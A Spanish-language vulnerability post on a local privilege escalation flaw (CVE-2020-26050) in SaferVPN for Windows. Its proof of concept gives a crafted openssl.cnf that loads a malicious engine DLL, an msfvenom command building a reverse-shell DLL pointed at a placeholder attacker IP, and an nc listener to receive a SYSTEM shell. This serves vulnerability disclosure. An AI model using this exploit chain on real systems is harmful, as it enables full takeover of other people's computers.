Falla en SaferVPN

vulnerabilidad

SaferVPN para Windows Ver 5.0.3.3 a 5.0.4.15 podría permitir la escalada de privilegios locales de usuarios con pocos privilegios al SISTEMA a través de un archivo de configuración openssl diseñado

Cuando SaferVPN intenta conectarse a un servidor VPN, genera openvpn.exe ( C:\Program Files (x86)\SaferVPN for Windows\bin\openvpn.exe) en el contexto de NT AUTHORITY \ SYSTEM. Intenta cargar un archivo de configuración openssl.cnf desde una carpeta que no existe (C: \ etc \ ssl \ openssl.cnf). Debido a que un usuario con pocos privilegios puede crear carpetas en C: \, es posible que el usuario cree la ruta adecuada y coloque el archivo openssl.cnf creado en ella. Una vez que se inicia el servicio openvpn.exe, el archivo openssl.cnf cargará una biblioteca de motor OpenSSL maliciosa que dará como resultado la ejecución de código arbitrario como SYSTEM.

Versión afectada: SaferVPN for Windows desde la versión 5.0.3.3 a la más reciente (que es 5.0.4.15 partir del 12 de Ene, 2021)

Prueba de concepto

1. Cree un archivo de configuración openssl.cnf con el siguiente contenido.

openssl_conf = openssl_init

[openssl_init]

engines = engine_section[engine_section]

root = root_section[root_section]

engine_id = root

dynamic_path = c:\\etc\\ssl\\root.dll

init = 0

2. Genere una dll maliciosa usando msfvenom (un shell inverso en este caso)

msfvenom -p windows / shell_reverse_tcp LHOST = [attacker_ip] LPORT = [attacker_port] -f dll> root.dll

3. Cree la siguiente carpeta y subcarpetas en C: \.

mkdir C: \ etc \ ssl

4. Coloque el archivo openssl.cnf creado en el paso 1 y el archivo root.dll creado en el paso 2 en C: \ etc \ ssl \.

5. Configurar un oyente en el cuadro de ataque

nc -lvnp [attacker_port]

6. Haga clic en el botón Conectar en la aplicación SaferVPN para Windows, debería recibir un shell del SISTEMA

Referencias:

https://thebinary0x1.medium.com/cve-2020-26050-safervpn-for-windows-local-privilege-escalation-da069bb1373c

https://vimeo.com/459654003

Gracias por visitar este sitio, espero que te haya gustado y vuelvas proximamente, compartela en las redes sociales, gracias

Compartir en Facebook Compartir en twitter

Semrush sigue a tu competencia

Fecha actualización el 2021-01-13. Fecha publicación el 2021-01-13. Categoría: vulnerabilidad Autor: Oscar olg Mapa del sitio Fuente: NIST